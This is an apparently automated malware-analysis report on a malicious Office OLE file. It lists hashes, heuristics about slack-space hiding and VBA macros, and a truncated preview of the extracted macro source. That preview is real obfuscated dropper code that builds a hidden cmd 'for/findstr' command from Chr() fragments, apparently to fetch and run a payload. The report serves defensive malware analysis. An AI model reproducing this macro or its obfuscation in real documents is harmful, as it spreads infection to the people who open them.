Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 042bd79adc78fade…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 145.5 KB
First seen: 2018-08-14
MD5: 0c927156d8ec4ad48edbbe02d696730e
SHA-1: 62d5838c922d2d414ae1f4779edf74faf3603883
SHA-256: 042bd79adc78fade249ca3a2f382581f9cf8e5c7054a18fd28f7c4a8e498bf89
Risk score: 62

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The file is an OLE document with a significant amount of slack space and detected VBA macros. The VBA code is heavily obfuscated, making it difficult to determine its exact function, but it is highly probable that it is designed to download and execute a secondary payload. The embedded URL, while marked as benign, is the only external reference found.

Heuristics (3)

  • OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY)
    The OLE file is 149,013 bytes but its declared streams total only 57,887 bytes; the remaining 91,126 bytes (61%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, OLE_VBA_MACROS)
    The document contains VBA macro code.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                               | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)  | 29778 bytes
SHA-256: f834bc3f8646b2345b7b1eddcaa8644b91619f85bf814e2086e90d742b600dd1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "kztzzHWYZ"
Private Function uQofBTmqh()
On Error Resume Next
   asvJq = (VSYLtc * isXQK) + 72840 - BojsAt * RzSrZK * 14469
   QtDDM = (PUABY * MkDnIw) + 27386 - ICIzjD * GUUSu * 645
   RacQn = (THWFlo * sXIFL) + 4813 - fhYnju * aNEITz * 88794
   ZwzjH = (AECrmA * zqCIi) + 77601 - jrXJA * Vaqwj * 36226
   SvqJS = (TTvWhb * TXJjKq) + 34076 - WAMoGO * wGrqN * 53364
   SdvQVh = (sMoBMd * GjqWZ) + 93864 - iUMZzX * irOKOu * 82407
End Function
Private Function ZFARPSC()
On Error Resume Next
   FdSrw = (TYvGj * PGFuu) + 43539 - tiXCf * YJmOE * 77833
   wQziH = (amikZ * zuGWz) + 74276 - PdukZ * zOMhp * 67947
   GmjoTY = (wFMTrb * PbNMbS) + 7749 - LOolnW * WFUqK * 53604
   PLfCGt = (NOwJl * CGajoi) + 51306 - zikRj * GzBQTB * 681
End Function
Private Function wHjjXPVcKizViw()
On Error Resume Next
   laGAzD = 39004 - UPuLjd - 45313 * VmbCj * tbBQb / DjVWP * (89149 + wlRqNJ + 70800 - jmwNiI)
   CLKhAo = 26760 - ZlbjvW - 74915 * LvKOj * awRdsm / iPCBVU * (25599 + QwIuw + 14245 - ophorj)
   jHoSiq = 37038 - Vpuffu - 17832 * nuPGF * Ulncm / nabDbA * (49253 + AozpM + 93182 - QYdGMw)
   OsjOQh = 60141 - hbDiou - 46581 * miZbEv * tvjMp / CwIVo * (13515 + jfdQGS + 16378 - GFwmOB)
   mhFCkO = 30541 - wbBvW - 47922 * ZBZAuz * UjsoI / wDvBUh * (32069 + PScBA + 52666 - SuMPP)
   TlUqan = 4243 - BDduvO - 81806 * fUvAw * ZuINDN / Wasqa * (14230 + HJzbz + 19356 - miCABh)
   mRiOl = 69365 - VJwFn - 51465 * jzaoIJ * jzztV / BpjYsR * (77593 + dTFvj + 15412 - IjvNAT)
End Function
Private Function BwAZMaiNjoUfc()
On Error Resume Next
   kShECC = (PonIU * jqCXo) + 7977 - PDjJhK * hPijdR * 20222
   kqjiiP = (QqfIGa * vuKsWj) + 73479 - XsDiz * DiDpC * 97441
   cufkIh = (mzvzS * tzOKSv) + 72672 - tibDzz * mQfSj * 28163
   pNJAN = (hRzmJ * FhQDp) + 72398 - pNKmF * NzuAU * 36684
   UHYwV = (TCown * GNBfk) + 90619 - ruZiFj * mrJpSJ * 95180
   uIdFVh = (McYObA * IkktuJ) + 89157 - TPujc * wiiOHh * 13804
End Function
Function XZnXrQ()
On Error Resume Next
CqbFMz = wcDcDj - hIrQBL - (98717 * NiaTiV)
   UBbkwz = kqETsU * tdzTS / 32879 * 44121 * (XGDaA / 23462)
OAziXwij = CStr(Chr(FYJhFLdYZiOFd + KYiuKmtiI + 109 + wAzlSorVtRrqi + XwBzSiKcYRzaJ)) + "d /" + CStr(Chr(uBzPOdao + OHiwTiAPXO + 99 + KRHlYZTSOhU + qsSQKwKpXD)) + " " + "for" + " , , " + "/F  , " + "; " + CStr(Chr(fFjzKmlRRqj + FBUtLjnAYdp + 34 + MSknnNjJsUkTDv + GzMJoFvpw)) + "  d" + "el"
tVWPEG = EZkEsc - Iazmw - (81758 * Btwmo)
   izJCcQ = HtlBq - oTRkZ - (89379 * kKZhZd)
BSmIRdwjiL = "i" + CStr(Chr(ncGcuRLZTh + TcTMjkZ + 109 + EkRdcYLHWuqa + hlsqCsVOjcwthV)) + "s" + "=PL2D" + "f" + " " + "  " + "t" + "okens=" + "   1 " + "  " + CStr(Chr(FWFlirowR + Rwmncdi + 34 + nuXOPpBpjjq + HpUUELpwt)) + " " + " ," + " ; %"
bacPsi = zGFYtu - LLzqAr - (19781 * bkhmQa)
   cdwTi = YPmmI - PrAUCG - (52409 * zjmiG)
   TNKXwo = WPLku - PdNjSo - (45581 * oFjhiz)
KPsivN = "^z" + " ;" + " ;" + " In , " + " ; ( ," + " , ' " + " , F" + "tY^^"
dqOpR = Izfqdd - dJfRV - (18175 * QZRim)
   NEDQl = jXnWB - apHPzM - (12253 * FwlVD)
   BPTiM = EGhYh - oRrcZW - (67569 * rvSUzu)
hMhuWmDV = "p^^e" + " ,  ; " + "^| " + ",  ;"
wwiSp = CItiF - KIQQF - (24177 * TTMjO)
   YfCfc = iMIQW - XcGkl - (40808 * ZzsMDw)
ZWGAPZmAqz = "  Fi" + "N^^" + "D ," + " ; " + CStr(Chr(sESwpTPz + aKzqWsqzR + 34 + JCozTHZ + iuVOWLXEzNTrGz)) + CStr(Chr(UihSwwcqHiB + WLqbmnjokULUlA + 99 + KCEHSwdrE + SfHoJuFdBcPU)) + CStr(Chr(pjKVwMw + wfzVjYiwXoG + 109 + djCajXCl + uHcOTWFlkuCK)) + CStr(Chr(ZYFTdsjD + GiTYfZUqCzC + 34 + JPcRCVU + XqAISjHBCr)) + "  " + ",  " + ";  '" + " ; " + ") ; " + " ^d" + "o  ," + "  ,"
GjTwh = BmNaz - AVTNFf - (17420 * QjbGrY)
kUHFv = " %^z; " + " , " + "SAk" + CStr(Chr(IoChFLaMHLJLUv + adhQYmG + 99 + XHliAuKqGB + jzKuuMMhpoW)) + "V" + CStr(Chr(bYJGYVha + DodGQwVNtdbq + 109 + WdauvijkGc + BkijsAZPGF)) + "B" + "/v"
PTtUwv = afYGIW - qHfYz - (98863 * diQjAZ)
RdlZaXHMcNP = "]~w" + "Wg^lR " + "^" + "   ; " + ", M" + "dBauhw" + "A/^" + "R  " + CStr(Chr(viTacBf + njuvnicwTiAhu + 34 + fNlbRQQRMVzM + HEwpdNAo)) + " , " + "(S^eT "
kvVWOX = CtTFj - SUXHL - (6840 * MHGwTM)
 
... (truncated)